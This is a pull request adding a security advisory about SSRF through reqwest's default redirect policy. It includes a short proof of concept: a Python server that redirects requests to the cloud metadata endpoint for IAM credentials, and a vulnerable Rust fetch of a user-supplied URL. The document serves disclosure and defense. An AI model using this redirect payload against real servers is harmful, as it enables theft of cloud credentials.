### PR TITLE
Add advisory: reqwest SSRF via default redirect policy

### DIFF
--- a/crates/reqwest/RUSTSEC-0000-0000.md
+++ b/crates/reqwest/RUSTSEC-0000-0000.md
@@ -1,0 +1,57 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "reqwest"
+date = "2026-02-23"
+url = "https://github.com/seanmonstar/reqwest/issues/2344"
+categories = ["code-execution"]
+cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"
+keywords = ["ssrf", "redirect", "private-network", "metadata", "cloud"]
+
+[versions]
+patched = []
+unaffected = []
+```
+
+# Default redirect policy follows redirects to private/internal networks (SSRF)
+
+`reqwest`'s default redirect policy (`redirect::Policy::default()`) follows up to 10 redirects without filtering redirect targets against private or internal IP ranges. This enables Server-Side Request Forgery (SSRF) when a server-side application fetches user-controlled URLs.
+
+## Impact
+
+An attacker who controls a URL fetched by a `reqwest`-based server application can redirect requests to:
+
+- **Cloud metadata endpoints** (e.g., `http://169.254.169.254/latest/meta-data/iam/security-credentials/`) to steal IAM credentials on AWS, GCP, or Azure
+- **Localhost services** (e.g., databases, caches, admin panels on `127.0.0.1`)
+- **Internal network hosts** (RFC 1918 addresses like `10.x.x.x`, `192.168.x.x`)
+
+This is a well-known attack class (CWE-918) that browsers mitigate with private network access controls, but `reqwest` provides no equivalent built-in protection.
+
+## Proof of Concept
+
+An attacker hosts a server that returns a 302 redirect to an internal target:
+
+```python
+# attacker_server.py
+from http.server import HTTPServer, BaseHTTPRequestHandler
+
+class Handler(BaseHTTPRequestHandler):
+    def do_GET(self):
+        self.send_response(302)
+        self.send_header('Location', 'http://169.254.169.254/latest/meta-data/iam/security-credentials/')
+        self.end_headers()
+
+HTTPServer(('0.0.0.0', 8080), Handler).serve_forever()
+```
+
+A vulnerable Rust application using default `reqwest` configuration:
+
+```rust
+// reqwest follows the 302 to the metadata endpoint
+let resp = reqwest::get(user_supplied_url).await?;
+let body = resp.text().await?; // Contains AWS IAM credentials
+```
+
+## Recommended Fix
+
+Provide a built-in redirect policy option that rejects redirects to private/reserved IP ranges (RFC 1918, link-local 169.254.x.x, loopback), and document the SSRF risk of the default policy for applications handling untrusted URLs.


### PR DESCRIPTION
reqwest's default redirect policy follows redirects to private/internal IP ranges (RFC 1918, link-local, loopback, cloud metadata endpoints), enabling SSRF in server-side applications that fetch user-controlled URLs.